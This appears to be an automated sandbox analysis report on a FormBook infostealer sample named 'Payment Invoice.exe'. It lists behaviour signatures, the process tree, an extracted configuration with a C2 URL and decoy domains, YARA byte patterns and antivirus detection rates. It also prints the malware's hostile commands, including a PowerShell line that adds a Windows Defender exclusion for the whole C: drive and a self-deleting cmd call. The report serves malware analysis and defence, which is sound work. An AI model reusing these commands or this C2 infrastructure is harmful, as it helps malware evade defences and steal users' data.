Play interactive tour

Edit tour

Analysis Report Payment Invoice.exe

Overview

General Information

Sample Name:	Payment Invoice.exe
Analysis ID:	385452
MD5:	ebfeaa73811b084ff7ec882503205988
SHA1:	893e9fd1b6f1ccb56dbc389799b93ecbf116ee74
SHA256:	bde02a4b70a0070b28f0e812f6f7a857f2d57e2c8b6f3d0f11c9bb6a66cdc05a
Tags:	exe
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

.NET source code contains potential unpacker

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Writes to foreign memory regions

Yara detected Costura Assembly Loader

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains strange resources

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

Payment Invoice.exe (PID: 6860 cmdline: 'C:\Users\user\Desktop\Payment Invoice.exe' MD5: EBFEAA73811B084FF7EC882503205988)

powershell.exe (PID: 6680 cmdline: 'powershell' Add-MpPreference -ExclusionPath C:\ MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 6728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Payment Invoice.exe (PID: 6744 cmdline: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe MD5: EBFEAA73811B084FF7EC882503205988)

Payment Invoice.exe (PID: 6948 cmdline: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe MD5: EBFEAA73811B084FF7EC882503205988)

explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

autoconv.exe (PID: 6752 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)

WWAHost.exe (PID: 6992 cmdline: C:\Windows\SysWOW64\WWAHost.exe MD5: 370C260333EB3149EF4E49C8F64652A0)

cmd.exe (PID: 5904 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\Payment Invoice.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.the-techs.info/chue/"], "decoy": ["wowmovies.today", "magentos6.com", "bi-nav.com", "atlantahawks.sucks", "wluabjy.icu", "kevableinsights.com", "lavidaenaustralia.com", "stonermadeapparel.net", "sondein.com", "cirquedusoleilartist.com", "kanjitem.com", "tomofalltrades.site", "mecanico.guru", "tech2020s.com", "amesoneco.com", "theawfulliar.com", "californiaadugurus.com", "rentalservicesolutions.com", "fsxbhd.club", "casino-seo.com", "asknesto.com", "get-rangextd.com", "gkwill.com", "juliegiles.net", "pagosafreedom.com", "wbpossiblellc.com", "fhjfyutotyhfse.com", "sexshopsatelite.com", "shellykraftlaw.com", "motherhenscoop.com", "mboklanjar.com", "redwoodcityswing.com", "haier-mz.com", "metalinjectionltd.asia", "franquiaoriginal.com", "mcronaldfood.com", "mobilegymconcierge.com", "haifu168.com", "apeiro.life", "thejosephnashvilletn.com", "bensbrickstore.com", "sanctumwell.com", "beanexthomie.com", "stylazhaircare.com", "jordanvanvleet.com", "jdwx400.com", "francescoricco.com", "gameshowsatschool.com", "alqymist-monaco.com", "infinitysportsmassage.com", "algorithmrecruitment.com", "tanyasubatang.com", "impressivebackyard.com", "wwwgocashwire.com", "visual-pioneers.net", "thememo-mobilebar.com", "wagner-fahrschulegmbh.com", "minterfortexas.com", "codelopers.com", "inyarsb.icu", "ravenlightproductions.com", "germiblock.com", "coutinhoefelipeadv.com", "diegobr1307.life"]}

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
Payment Invoice.exe	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000015.00000002.908858875.0000000000380000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000015.00000002.908858875.0000000000380000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000015.00000002.908858875.0000000000380000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.716578799.00000000004E2000.00000002.00020000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000D.00000002.714247594.0000000000142000.00000002.00020000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000001.00000002.721973230.0000000003C24000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.721973230.0000000003C24000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xa458:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xa6c2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x161f5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15ce1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x162f7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1646f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xb0da:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x14f5c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xbdd3:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1c067:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1d06a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.721973230.0000000003C24000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18f89:$sqlite3step: 68 34 1C 7B E1 0x1909c:$sqlite3step: 68 34 1C 7B E1 0x18fb8:$sqlite3text: 68 38 2A 90 C5 0x190dd:$sqlite3text: 68 38 2A 90 C5 0x18fcb:$sqlite3blob: 68 53 D8 7F 8C 0x190f3:$sqlite3blob: 68 53 D8 7F 8C
00000015.00000002.909529703.00000000007AA000.00000004.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000015.00000002.912797173.0000000003BEF000.00000004.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000E.00000000.715166926.0000000000C22000.00000002.00020000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000001.00000002.720423226.00000000029B1000.00000004.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000E.00000002.781657076.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000E.00000002.781657076.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000E.00000002.781657076.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000003.712145494.0000000007311000.00000004.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000D.00000000.713411338.0000000000142000.00000002.00020000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000015.00000002.910248106.0000000002E30000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000015.00000002.910248106.0000000002E30000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000015.00000002.910248106.0000000002E30000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
0000000E.00000002.782477108.0000000001660000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000E.00000002.782477108.0000000001660000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000E.00000002.782477108.0000000001660000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
0000000E.00000002.781781512.0000000000C22000.00000002.00020000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000E.00000002.782306537.0000000001230000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000E.00000002.782306537.0000000001230000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000E.00000002.782306537.0000000001230000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000000.640844843.00000000004E2000.00000002.00020000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000001.00000002.721408933.0000000003AD1000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.721408933.0000000003AD1000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xc2668:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xc28d2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x10d438:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x10d6a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xce405:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xf11b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x1191d5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xcdef1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xf0ca1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x118cc1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xce507:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xf12b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1192d7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xce67f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xf142f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x11944f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xc32ea:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x10e0ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xcd16c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xeff1c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x117f3c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
00000001.00000002.721408933.0000000003AD1000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0xd1199:$sqlite3step: 68 34 1C 7B E1 0xd12ac:$sqlite3step: 68 34 1C 7B E1 0xf3f49:$sqlite3step: 68 34 1C 7B E1 0xf405c:$sqlite3step: 68 34 1C 7B E1 0x11bf69:$sqlite3step: 68 34 1C 7B E1 0x11c07c:$sqlite3step: 68 34 1C 7B E1 0xd11c8:$sqlite3text: 68 38 2A 90 C5 0xd12ed:$sqlite3text: 68 38 2A 90 C5 0xf3f78:$sqlite3text: 68 38 2A 90 C5 0xf409d:$sqlite3text: 68 38 2A 90 C5 0x11bf98:$sqlite3text: 68 38 2A 90 C5 0x11c0bd:$sqlite3text: 68 38 2A 90 C5 0xd11db:$sqlite3blob: 68 53 D8 7F 8C 0xd1303:$sqlite3blob: 68 53 D8 7F 8C 0xf3f8b:$sqlite3blob: 68 53 D8 7F 8C 0xf40b3:$sqlite3blob: 68 53 D8 7F 8C 0x11bfab:$sqlite3blob: 68 53 D8 7F 8C 0x11c0d3:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: WWAHost.exe PID: 6992	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: Payment Invoice.exe PID: 6744	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: Payment Invoice.exe PID: 6948	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: Payment Invoice.exe PID: 6860	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Click to see the 30 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
21.2.WWAHost.exe.3bef834.4.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
14.0.Payment Invoice.exe.c20000.0.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
21.2.WWAHost.exe.3bef834.4.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
13.0.Payment Invoice.exe.140000.0.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
14.2.Payment Invoice.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
14.2.Payment Invoice.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1a6f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1b6fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
14.2.Payment Invoice.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17619:$sqlite3step: 68 34 1C 7B E1 0x1772c:$sqlite3step: 68 34 1C 7B E1 0x17648:$sqlite3text: 68 38 2A 90 C5 0x1776d:$sqlite3text: 68 38 2A 90 C5 0x1765b:$sqlite3blob: 68 53 D8 7F 8C 0x17783:$sqlite3blob: 68 53 D8 7F 8C
14.2.Payment Invoice.exe.c20000.1.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
1.2.Payment Invoice.exe.3ad1990.6.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.Payment Invoice.exe.3ad1990.6.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xc1cd8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xc1f42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x10caa8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x10cd12:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xcda75:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xf0825:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x118845:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xcd561:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xf0311:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x118331:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xcdb77:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xf0927:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x118947:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xcdcef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xf0a9f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x118abf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xc295a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x10d72a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xcc7dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xef58c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x1175ac:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
1.2.Payment Invoice.exe.3ad1990.6.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0xd0809:$sqlite3step: 68 34 1C 7B E1 0xd091c:$sqlite3step: 68 34 1C 7B E1 0xf35b9:$sqlite3step: 68 34 1C 7B E1 0xf36cc:$sqlite3step: 68 34 1C 7B E1 0x11b5d9:$sqlite3step: 68 34 1C 7B E1 0x11b6ec:$sqlite3step: 68 34 1C 7B E1 0xd0838:$sqlite3text: 68 38 2A 90 C5 0xd095d:$sqlite3text: 68 38 2A 90 C5 0xf35e8:$sqlite3text: 68 38 2A 90 C5 0xf370d:$sqlite3text: 68 38 2A 90 C5 0x11b608:$sqlite3text: 68 38 2A 90 C5 0x11b72d:$sqlite3text: 68 38 2A 90 C5 0xd084b:$sqlite3blob: 68 53 D8 7F 8C 0xd0973:$sqlite3blob: 68 53 D8 7F 8C 0xf35fb:$sqlite3blob: 68 53 D8 7F 8C 0xf3723:$sqlite3blob: 68 53 D8 7F 8C 0x11b61b:$sqlite3blob: 68 53 D8 7F 8C 0x11b743:$sqlite3blob: 68 53 D8 7F 8C
1.0.Payment Invoice.exe.4e0000.0.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
1.2.Payment Invoice.exe.4e0000.0.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
14.2.Payment Invoice.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
14.2.Payment Invoice.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
14.2.Payment Invoice.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18419:$sqlite3step: 68 34 1C 7B E1 0x1852c:$sqlite3step: 68 34 1C 7B E1 0x18448:$sqlite3text: 68 38 2A 90 C5 0x1856d:$sqlite3text: 68 38 2A 90 C5 0x1845b:$sqlite3blob: 68 53 D8 7F 8C 0x18583:$sqlite3blob: 68 53 D8 7F 8C
13.2.Payment Invoice.exe.140000.0.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Click to see the 12 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000015.00000002.908858875.0000000000380000.00000004.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.the-techs.info/chue/"], "decoy": ["wowmovies.today", "magentos6.com", "bi-nav.com", "atlantahawks.sucks", "wluabjy.icu", "kevableinsights.com", "lavidaenaustralia.com", "stonermadeapparel.net", "sondein.com", "cirquedusoleilartist.com", "kanjitem.com", "tomofalltrades.site", "mecanico.guru", "tech2020s.com", "amesoneco.com", "theawfulliar.com", "californiaadugurus.com", "rentalservicesolutions.com", "fsxbhd.club", "casino-seo.com", "asknesto.com", "get-rangextd.com", "gkwill.com", "juliegiles.net", "pagosafreedom.com", "wbpossiblellc.com", "fhjfyutotyhfse.com", "sexshopsatelite.com", "shellykraftlaw.com", "motherhenscoop.com", "mboklanjar.com", "redwoodcityswing.com", "haier-mz.com", "metalinjectionltd.asia", "franquiaoriginal.com", "mcronaldfood.com", "mobilegymconcierge.com", "haifu168.com", "apeiro.life", "thejosephnashvilletn.com", "bensbrickstore.com", "sanctumwell.com", "beanexthomie.com", "stylazhaircare.com", "jordanvanvleet.com", "jdwx400.com", "francescoricco.com", "gameshowsatschool.com", "alqymist-monaco.com", "infinitysportsmassage.com", "algorithmrecruitment.com", "tanyasubatang.com", "impressivebackyard.com", "wwwgocashwire.com", "visual-pioneers.net", "thememo-mobilebar.com", "wagner-fahrschulegmbh.com", "minterfortexas.com", "codelopers.com", "inyarsb.icu", "ravenlightproductions.com", "germiblock.com", "coutinhoefelipeadv.com", "diegobr1307.life"]}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe

ReversingLabs: Detection: 29%

Multi AV Scanner detection for submitted file

Show sources

Source: Payment Invoice.exe	Virustotal: Detection: 33%			Perma Link
Source: Payment Invoice.exe	ReversingLabs: Detection: 29%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000015.00000002.908858875.0000000000380000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.721973230.0000000003C24000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.781657076.0000000000400000.00000040.00000001.sdmp, type: MEMORY
